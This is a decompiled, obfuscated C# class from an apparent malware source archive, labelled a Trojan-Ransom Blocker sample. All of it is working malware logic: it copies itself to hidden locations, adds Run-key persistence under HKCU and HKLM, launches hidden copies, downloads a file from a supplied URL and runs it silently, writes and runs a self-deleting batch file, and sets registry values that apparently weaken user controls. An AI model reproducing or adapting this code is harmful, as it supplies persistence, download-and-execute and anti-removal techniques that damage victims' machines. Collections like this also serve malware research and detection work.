MalwareSourceCode/MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c3f3e07dcb3874c5b417537b713b608b7.cs

197 lines
8.5 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: A.c3f3e07dcb3874c5b417537b713b608b7
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Threading;
namespace A
{
internal class c3f3e07dcb3874c5b417537b713b608b7
{
private Mutex c96cf8adc07121b9089c8779f8a06475a;
public void c366d1ab19bbdf3ebcee35b30020550b1()
{
this.cc286121f05a5cd6b2f553091501ad86b();
this.c44a8775ef705aea893c2464d5dc35368();
this.c3a314ec321315e78451e3a3160d4e530();
}
private void cc286121f05a5cd6b2f553091501ad86b()
{
try
{
this.c96cf8adc07121b9089c8779f8a06475a = new Mutex(true, c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c053a2ccab85d88a8bb0dd1fb41fedf35);
this.c96cf8adc07121b9089c8779f8a06475a.ReleaseMutex();
}
catch
{
Environment.Exit(-1);
}
}
private void c3a314ec321315e78451e3a3160d4e530()
{
string fileName = Process.GetCurrentProcess().MainModule.FileName;
if (this.c26b99a61e58734baa67d710bbfd72df9())
return;
try
{
foreach (string str in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e)
{
if (!c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8f544c7c514248e2027acc2eed25b743(str))
System.IO.File.Copy(fileName, str);
System.IO.File.SetAttributes(str, FileAttributes.Hidden);
}
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).SetValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[0], (object) ('"'.ToString() + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e[0] + (object) '"'));
Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).SetValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[1], (object) ('"'.ToString() + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e[1] + (object) '"'));
}
catch
{
}
try
{
this.c96cf8adc07121b9089c8779f8a06475a.Close();
foreach (string str in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e)
new Process()
{
StartInfo = {
FileName = str,
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
Environment.Exit(-1);
}
public void c32ad199a1a1b21b2f3794ba8b7927c6b(string cf6d6107114ce95c52d91a8d33c162461)
{
try
{
this.c96cf8adc07121b9089c8779f8a06475a.Close();
}
catch
{
}
try
{
string str = c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c4028bc68211f16a03921654b4b8b346f(new Random().Next(5, 12)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1680);
new WebClient().DownloadFile(cf6d6107114ce95c52d91a8d33c162461, Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str);
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str),
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
this.c514ba733b87988f147798195875c1771();
Environment.Exit(-1);
}
public void ceaf8f38b42d6fe6312cc350ddb4ba0d6()
{
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).DeleteValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[0]);
Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).DeleteValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[1]);
}
catch
{
}
try
{
foreach (string path in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e)
System.IO.File.Delete(path);
}
catch
{
}
this.c514ba733b87988f147798195875c1771();
Environment.Exit(-1);
}
private bool c26b99a61e58734baa67d710bbfd72df9()
{
string[] c712648a24a265f1e1bc00c1dfbecbd3e = c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e;
int index = 0;
if (index < c712648a24a265f1e1bc00c1dfbecbd3e.Length)
{
string c8ce60bab4df112e38d93bdc39407e331 = c712648a24a265f1e1bc00c1dfbecbd3e[index];
if (!c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8f544c7c514248e2027acc2eed25b743(c8ce60bab4df112e38d93bdc39407e331))
return false;
}
return true;
}
private void c514ba733b87988f147798195875c1771()
{
try
{
string str = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1796) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1813) + (object) '"' + Path.GetFileName(Process.GetCurrentProcess().MainModule.FileName) + (object) '"' + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1834);
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1851));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1851)),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
private void c44a8775ef705aea893c2464d5dc35368()
{
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1874), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1993), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2006), RegistryValueKind.DWord);
}
catch
{
}
if (!c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ca20a8f4602f269ed2947b3a5ca5860a2)
return;
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1874), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2009), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord);
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2047), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2162), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2047), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2162), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord);
}
catch
{
}
}
}
}